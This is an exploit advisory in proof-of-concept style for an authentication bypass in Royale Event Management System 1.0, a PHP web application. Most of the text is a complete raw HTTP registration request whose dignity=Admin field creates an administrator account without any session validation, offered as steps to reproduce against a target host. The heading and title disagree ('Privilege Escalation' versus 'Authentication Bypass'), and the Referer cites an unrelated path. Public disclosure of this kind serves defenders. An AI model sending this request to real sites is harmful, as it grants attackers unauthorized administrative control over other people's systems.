Royale Event Management System 1.0 Privilege Escalation

`# Exploit Title: Royale Event Management System 1.0 - Authentication Bypass  
# Date: 25/03/2022  
# Exploit Author: Mr Empy  
# Software Link:  
https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html  
# Version: 1.0  
# Tested on: Linux  
  
  
Title:  
================  
Royale Event Management System 1.0 - Authentication Bypass  
  
  
Summary:  
================  
Royale Event Management System version 1.0 is affected by a vulnerability  
that allows an attacker to bypass authentication. Because of the lack of  
session validation, the attacker could register a user with administrative  
permissions over the application and gain full access to it.  
  
  
Severity Level:  
================  
7.3 (High)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L  
  
  
Affected Product:  
================  
Royale Event Management System v1.0  
  
  
Steps to Reproduce:  
================  
  
1. Open a request repeater (like Burp Suite) and send this request:  
  
POST /royal_event/userregister.php HTTP/1.1  
Host: target.com  
Content-Length: 164  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://target.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://target.com/one_church/userregister.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
dignity=Admin&staffid=1000&fullname=<NICKNAME_HERE>&firstname=<FIRST_NAME>&lastname=<LAST_NAME>&mobileno=2520000000&emailid=<YOUR_EMAIL>&password=<YOUR_PASSWORD>&confirmpassword=<YOUR_PASSWORD>&signup=Register  
  
Fill in the parameters with the values according to each one of them and  
send the request.  
`